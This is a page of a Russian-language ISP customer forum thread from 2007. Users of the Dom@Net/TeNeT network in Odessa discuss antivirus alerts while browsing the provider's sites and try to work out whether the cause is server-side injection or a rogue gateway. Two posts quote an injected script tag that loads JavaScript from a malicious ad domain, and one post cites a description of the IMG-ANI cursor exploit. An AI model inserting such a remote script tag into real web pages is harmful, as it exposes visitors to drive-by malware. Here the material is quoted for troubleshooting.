Тема: Вопросы и жалобы по Dom@Net(*)

Закрытая тема
Страница 188 из 406 ПерваяПервая ... 88 138 178 186 187 188 189 190 198 238 288 ... ПоследняяПоследняя
Показано с 3,741 по 3,760 из 8104
  1. Вверх #3741
    User banned Аватар для Kaiser_Wilhelm_II
    Пол
    Мужской
    Адрес
    https://t.me/pump_upp
    Сообщений
    7,312
    Репутация
    1193
    MistiC - скорее всего такое безобразие именно у вас на компьютере, иначе бы тут толпы народу просто вопили бы о "зараженном вирусами Тенете"...


  2. Вверх #3742
    Постоялец форума Аватар для dron007
    Пол
    Мужской
    Возраст
    46
    Сообщений
    1,794
    Репутация
    766
    Цитата Сообщение от Kaiser_Wilhelm_II Посмотреть сообщение
    MistiC - скорее всего такое безобразие именно у вас на компьютере, иначе бы тут толпы народу просто вопили бы о "зараженном вирусами Тенете"...
    Толпы не толпы, но кто-то писал про аналогичное на мклубе и у меня то же самое уже несколько дней. Именно этот же файл выдает 6-й Касперский. Вот дословно: вредоносная программа Exploit.Win32.IMG-ANI.ac, файл: hxxp://ads.adslooks.info/ads.c (заменил http на всякий случай)

    Смотрел сниффером, на разных страницах Тенета (Mclub, новый файлообменник, основной сайт) перед тегом HTML идет такая строка:
    Код:
     
    <SCRIPT LANGUAGE="javascript1.2" SRC="http://ads.adslooks.info/ads.js"></SCRIPT>
    На неё-то и ругаются антивирусы. Вероятность того, что проблема на сервере конечно невелика, тем более, что эта строка то появляется, то пропадает и внешние серваки её не видят (HTML-валидатор W3C, например). Значит заражена клиентская машина. Кто-то локально висит, перехватывает HTTP-трафик и встраивает своё. Но пока найти ничего не удалось, все проверки говорят, что всё хорошо. И вообще непонятно, зачем пытаться таким образом заражать машину, раз она уже заражена. Рекламу вываливать? Что особенно странно, что такое появляется только на сайтах Тенета.

    Вот, кстати, очень похожая ситуация.
    http://virusinfo.info/showthread.php?p=156946
    Последний раз редактировалось dron007; 06.12.2007 в 01:56.

  3. Вверх #3743
    Ягода Маринка

    Аватар для pupsa
    Пол
    Женский
    Адрес
    Одесса, Украина
    Сообщений
    183,127
    Репутация
    215210
    Цитата Сообщение от Kaiser_Wilhelm_II Посмотреть сообщение
    MistiC - скорее всего такое безобразие именно у вас на компьютере, иначе бы тут толпы народу просто вопили бы о "зараженном вирусами Тенете"...
    "Вы будете смеяться"...., но я тоже "воплю"...
    И у меня.... не постоянно , но при загрузке стартовой(а она у меня Тенет) НОД сигналит о Трояне....
    "Между 34 и 35 годами я прожила 10 прекрасных лет"

  4. Вверх #3744
    Администратор Аватар для DevelopeR
    Пол
    Мужской
    Адрес
    Odessa
    Сообщений
    4,154
    Репутация
    2821
    Специально облазил ИЕшником и Оперой и сайт тенета и мклуб и фп.
    Никаких подобных строчек не видел, антивирус нислова не сказал.

    Быть может дело в броузере, адБлокере или еще чем-то?
    Приходили сектанты, говорили что-то о добрых делах. Предложил им вынести мусор - обиделись и ушли...

  5. Вверх #3745
    Постоялец форума Аватар для dron007
    Пол
    Мужской
    Возраст
    46
    Сообщений
    1,794
    Репутация
    766
    Проверялось в IE и в Опере - результат один и тот же. Глобальных адблокеров нет. В данный момент снова всё чисто - никаких строчек <SCRIPT> на страницах. Он то появляется, то пропадает.

    Расшифровал код вируса. Пытается заражать машину один раз. После запуска ставит куки OKMOON=SUN. Использует всякие уязвимости в сторонних ActiveX и какую-то уязвимость с загрузкой курсора в IE. Иногда, если получается, загружает CAB со своего сайта. Никакой рекламы не показывает. В общем, выглядит как серверный. Ну зачем пытаться загружать CAB на уже зараженную машину?

  6. Вверх #3746
    Мое предположение:
    долбо*** покупает новый комп
    умная виста говорит
    - а я могу быть сервером всей твоея сети! Да?
    - конечно да! я же самый крутой
    - антивир будем ставить?
    - Нет! я же самый умный!
    далее чудо цепляет трояна и назначив себя шлюзом сети пхает трояна всем в сети при обращении к внутрисетевым ресурсам (тенет, мклуб, видео)
    походу кстати именно троян этот и мог включить его как шлюз исключив из пищевой цепочки "умную висту" и момент "крутости"
    итого достаточно не иметь антивиря и посадить себе этого трояна
    это мое сугубо личное мнение конечно, может и ошибочное и безграмотное.
    Кстати статья на эту же тему - http://virusinfo.info/showthread.php?p=156946

    ====
    *** - дятел
    Последний раз редактировалось Dimiz; 06.12.2007 в 10:55.
    Don't explain. Don't complain.

  7. Вверх #3747
    Нашел с чем его кушать

    Взято тут:
    http://www.viruslist.com/ru/viruses/encyclopedia?virusid=70789

    Exploit.Win32.IMG-ANI

    Другие названия
    Exploit.Win32.IMG-ANI («Лаборатория Касперского») также известен как: Bloodhound.Exploit.20 (Symantec), Exploit.Win32.MS05-002.Gen (SOFTWIN), Exploit/LoadImage (Panda)

    Технические детали

    Программа-эксплойт, представляющая собой файл графического формата (bmp, cur, ico или ani). Размер файла произвольный. Наиболее типичен формат ani и малый размер файла (до нескольких КБ).

    Эксплуатирует уязвимость в алгоритме обработки графических файлов одной из системных библиотек Windows. При попытке просмотра файла, вследствие переполнения буфера на зараженной машине выполняется произвольный код.

    Идентификатор уязвимости — CAN-2004-1049. Исправлена в обновлении MS05-002 от Microsoft.
    --------------------------------------------------------------------------
    Вот эта линка:
    http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
    God doesn't believe in atheists

  8. Вверх #3748
    Постоялец форума Аватар для dron007
    Пол
    Мужской
    Возраст
    46
    Сообщений
    1,794
    Репутация
    766
    A+heis+, там их вообще-то целый набор. Это описание только одной уязвимости.

    Dimiz, а такое возможно? Любой комп может стать шлюзом и перехватывать и обрабатывать трафик всей сети, да ещё так что админы этого не замечают и не отрубают его? Как можно проверить это? Посмотреть в свойствах соединения какой назначен шлюз?

  9. Вверх #3749
    Частый гость Аватар для MistiC
    Пол
    Мужской
    Адрес
    Одесса
    Сообщений
    667
    Репутация
    61
    Смотрел сниффером, на разных страницах Тенета (Mclub, новый файлообменник, основной сайт) перед тегом HTML идет такая строка:
    Код:
     
    <SCRIPT LANGUAGE="javascript1.2" SRC="http://ads.adslooks.info/ads.js"></SCRIPT>
    ИМЕННО ОНО!Постоянно с Мклуба и главной и фтп...В тенете грят переустановите,но не грят что!))))
    Кароче вирь валит из сети,рекламка и т.д.

    Вирей на машине нет-Аутпост и НОД справятся с чем угодно...
    Unam In Armis Salutae!!!!!

  10. Вверх #3750
    Частый гость Аватар для MistiC
    Пол
    Мужской
    Адрес
    Одесса
    Сообщений
    667
    Репутация
    61
    Цитата Сообщение от dron007 Посмотреть сообщение
    A+heis+, там их вообще-то целый набор. Это описание только одной уязвимости.

    Dimiz, а такое возможно? Любой комп может стать шлюзом и перехватывать и обрабатывать трафик всей сети, да ещё так что админы этого не замечают и не отрубают его? Как можно проверить это? Посмотреть в свойствах соединения какой назначен шлюз?
    Постоянно Оутпост блочит сообщения о попытке смены шлюза-выдает ИП и МАС атакера)
    Unam In Armis Salutae!!!!!

  11. Вверх #3751
    Администратор Аватар для DevelopeR
    Пол
    Мужской
    Адрес
    Odessa
    Сообщений
    4,154
    Репутация
    2821
    Vernius, PPS - если бы вы внимательно прочитали эту ветку - то знали бы, что ускорить подключение нельзя. Подключение происходит в порядке живой очереди, или если повезет и на очереди будут люди з Вашего дома.
    Приходили сектанты, говорили что-то о добрых делах. Предложил им вынести мусор - обиделись и ушли...

  12. Вверх #3752
    Администратор Аватар для DevelopeR
    Пол
    Мужской
    Адрес
    Odessa
    Сообщений
    4,154
    Репутация
    2821
    Чтобы небыло проблем со сменившимся шлюзом - выключаем внутресетевые айпи (отключить TCP-IP на соеденении с локальной сетью), подключаемся по PPPoE и радуемся жизни.
    Приходили сектанты, говорили что-то о добрых делах. Предложил им вынести мусор - обиделись и ушли...

  13. Вверх #3753
    Постоялец форума Аватар для Respectable
    Пол
    Мужской
    Адрес
    Одесса
    Сообщений
    2,121
    Репутация
    2008
    Точно не уверен, что пишу где надо, но ОЧЕНЬ меня достала скорость скачивания медиа файлов! Всегда было от 200 до 300, а теперь как на внешке 10 - 25

  14. Вверх #3754
    Бывалый
    Аватар для fatman
    Пол
    Мужской
    Возраст
    46
    Сообщений
    9,111
    Репутация
    1666
    Цитата Сообщение от mclub
    <html>
    <head>
    <title>- Media Club - (MP3, Photo, Lyrics, Covers)</title>
    <link rel="STYLESHEET" type="text/css" href="/style.css">
    Цитата Сообщение от tenet.ua
    <html>
    <head>
    <title>TeNeT > Главная</title>
    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
    Цитата Сообщение от http://fp.te.net.ua/fx/
    <html>
    <head><title>Index of /fx/</title></head>
    <body bgcolor="white">
    как вы думаете, почему у меня нет нигде джаваскрипта троянского ни в одной из вышеперечисленных страниц?

  15. Вверх #3755
    Частый гость Аватар для MistiC
    Пол
    Мужской
    Адрес
    Одесса
    Сообщений
    667
    Репутация
    61
    Ты весь текст просмотрел?
    Ну не знаю,еси считаешь НОД и Аутпост ненадежные проги...
    Факт один-тока на сайтах тенета выдает блок на трояна...
    Unam In Armis Salutae!!!!!

  16. Вверх #3756
    Бывалый
    Аватар для fatman
    Пол
    Мужской
    Возраст
    46
    Сообщений
    9,111
    Репутация
    1666
    зачем мне просматривать весь текст, если вы сами же тут заявляли, что троян вешается в самом начале, перед открывающим тэгом <html> ?
    я вообще-то к тому, что , если б сидело оно непосредственно на тенетовском хосте - то и у меня это было б видно, и мой бы антифирь кричал бы.
    а так...

  17. Вверх #3757
    Посетитель
    Пол
    Мужской
    Сообщений
    432
    Репутация
    211
    Цитата Сообщение от DevelopeR Посмотреть сообщение
    Vernius, PPS - если бы вы внимательно прочитали эту ветку - то знали бы, что ускорить подключение нельзя. Подключение происходит в порядке живой очереди, или если повезет и на очереди будут люди з Вашего дома.
    188 страниц?! =) Понимаю 8, на крайняк 18, но не 188 же!

    Так "нельзя", "или если повезет и на очереди будут люди з Вашего дома"?
    Это как пример. Потому и написал адрес заодно, что может и тут кто откликнется. А может и сам тенет решит в наших домах объявления расклеить. Так, глядишь, и люди найдутся, и "быстрее" раньше наступит.

    Да и мы вроде как в Одессе, где было бы желание договориться
    Может при оплате на год вперед заведут еще до НГ =)


    <Вырезано, шоб не нарушать>
    Последний раз редактировалось PPS; 06.12.2007 в 22:48.

  18. Вверх #3758
    User banned Аватар для Kaiser_Wilhelm_II
    Пол
    Мужской
    Адрес
    https://t.me/pump_upp
    Сообщений
    7,312
    Репутация
    1193
    PPS - почиайте правила данного подраздела и поймете, почему ваш пост был удален. О поиске возможностей подключения гораздо целесообразнее создать топик в разеделе "Интернет. Технические вопросы".

  19. Вверх #3759
    Частый гость Аватар для KolobocK
    Пол
    Мужской
    Адрес
    Одесса, как она есть!
    Сообщений
    691
    Репутация
    671
    Цитата Сообщение от fatman Посмотреть сообщение
    как вы думаете, почему у меня нет нигде джаваскрипта троянского ни в одной из вышеперечисленных страниц?
    говорили уже -- не всегда код присутствует на страницах, вот к примеру, у меня сразу при загрузке компа есть такой код, жду 10 минут, обновляю страницу -- и могу спокойно далее логиниться на М-Клаб к примеру.

    я таки склоняюсь, что эти "гадости" цепляются на стороне сервера, т.к. пакеты приходят уже с кодом внедрённым.

  20. Вверх #3760
    Постоялец форума Аватар для dron007
    Пол
    Мужской
    Возраст
    46
    Сообщений
    1,794
    Репутация
    766
    Час назад не проявлялось, а сейчас на Мклубе наблюдается. Шлюз не менялся - какой выдан, такой и стоит. Че ещё проверять не знаю.


Закрытая тема
Страница 188 из 406 ПерваяПервая ... 88 138 178 186 187 188 189 190 198 238 288 ... ПоследняяПоследняя

Похожие темы

  1. Для пользователей Dom@Net. ICR сервер, линк на Чёрное Море.
    от Turtalaha в разделе Интернет :: технические вопросы
    Ответов: 14
    Последнее сообщение: 04.06.2005, 22:35
  2. Вопрос пользователям Dom@net (p2p-клиенты)
    от iMo в разделе Интернет
    Ответов: 69
    Последнее сообщение: 04.03.2005, 19:55
  3. mirc (канал на тенете #Dom@Net)
    от Setup в разделе Интернет
    Ответов: 10
    Последнее сообщение: 21.11.2004, 15:36
  4. Пользователи Dom@Net (ТеНет) надо протестировать ftp сервер
    от klon в разделе Интернет :: технические вопросы
    Ответов: 8
    Последнее сообщение: 28.10.2004, 04:10
  5. Как подключают в Тенете к dom@net
    от Bucha в разделе Интернет :: технические вопросы
    Ответов: 14
    Последнее сообщение: 09.10.2004, 19:03

Метки этой темы

Социальные закладки

Социальные закладки

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения